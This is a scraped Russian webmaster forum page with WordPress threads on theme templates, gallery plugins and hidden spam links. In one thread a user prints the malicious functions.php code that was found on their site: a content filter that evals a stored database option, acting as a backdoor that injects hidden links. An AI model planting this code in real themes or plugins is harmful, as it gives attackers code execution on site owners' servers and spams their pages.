- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Volday, Я особо не шарю, тема: Samara версии 1.0 от NewWpThemes.com
В файле archive.php заменить
на
<?php the_content(''); ?>и будет выводить также как на главной.
Volday, Спасибо больше, помог!)
Там ТС не общительная какае-то.. я ее как-то спросил о том, как вставить один код, дык она ответила: код немой, поэтому разбирайтесь сами. Также брала у меня заданее на 1 месяц(должна была добавить 200 статей) по истечению срока сказала: извините, задание выполнить не могу.. Честно, я бы ей голову оторвал, если бы встретил.. цена вопроса была около 200$
Саму ВС найти НЕ могу.. но размещены они на 37 стр, всего 37 анкоров "." примерно на 20 страничках(в подробном просмотре статьи).
В ЛС скиньте урл, если не секрет. Или в теме урл покажите. Не увидев сайта, сложно понять и тем более что-то посоветовать.)
Здравствуйте, на WP 3.3.1 появилось куча ВС спрятанных в символ "." Как от этого избавиться? Заную, что можно установить плагин, который превратит все ВС во внутреннии ссылки, но мне хотелось бы ПОЛНОСТЬЮ избавится от этого хлама + очень хочется понять, как они туда попали.. сайт новый, о нем никто не знает. Может это человек, который сделал сайт на заказ туда их затулила? В самом коде странички, эти ВС не нахожу... следовательно они спрятаны где-то в движке?
Проблема была в functions.php:
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
---------- Добавлено 07.03.2012 в 19:33 ----------
кстати, совсем недавно вылетело половина всех страниц из выдачи Яндекса, полагаю, что это произошло именно из-за этих "скрытых" ссылок.
Интересует плагин способный создавать красивые разноформатные альбомы в ВП.
Сейчас стоит NextGen Gallery, но полноформатные альбомы становятся нормально, а вот в компакте только 1 в строчке второй альбом съезжает на следующую строку....
Если кто поможет толковым советом по плагину или хотя бы подскажет как настроить вывод компактных альбомов - заранее респект...
Savanna2009, с ним есть морока. Пробуйте переключать темы плагина. Потом он не со всеми темами и не во всех броузерах работает корректно. И конфликтует с некоторыми другими плагинами, например с кнопками лайков и шеров.
Поначалу казалось что крутой плагин, потом перешел на государственную галерею, которая автоматом делается, если несколько фоток загружать сразу.
Если очень хочется именно некстген, то подбирайте тему, в которой он работает корректно. У меня в теме Брунелески все хорошо работает, во всех броузерах и с лайками и со всем что мне надо.
Спасибо за ответ, но тему менять поздно.... как- то потрудились над ней не за зря...
Может кто знает дельную альтернативу некстжену....?
кто знает дельную альтернативу некстжену....
Я же написал - родной, государственный плагин галереи. Страницы получаются как тут: http://www.antikitch.ru/?p=1161 Не годится? Заодно х/количество фото холявных страниц четвертого уровня)
родной, государственный плагин галереи.
Скорее всего речь идет не о плагине, а о функции темы - форматы записей. Соответственно, её для использования тема должна его поддерживать. "Государственная" ;) twentyeleven поддерживает.
"Государственная" twentyeleven поддерживает.
Брунелеска тоже. Остальные не пробовал. Не идеальное решение, если честно, но от нген отказался в его пользу.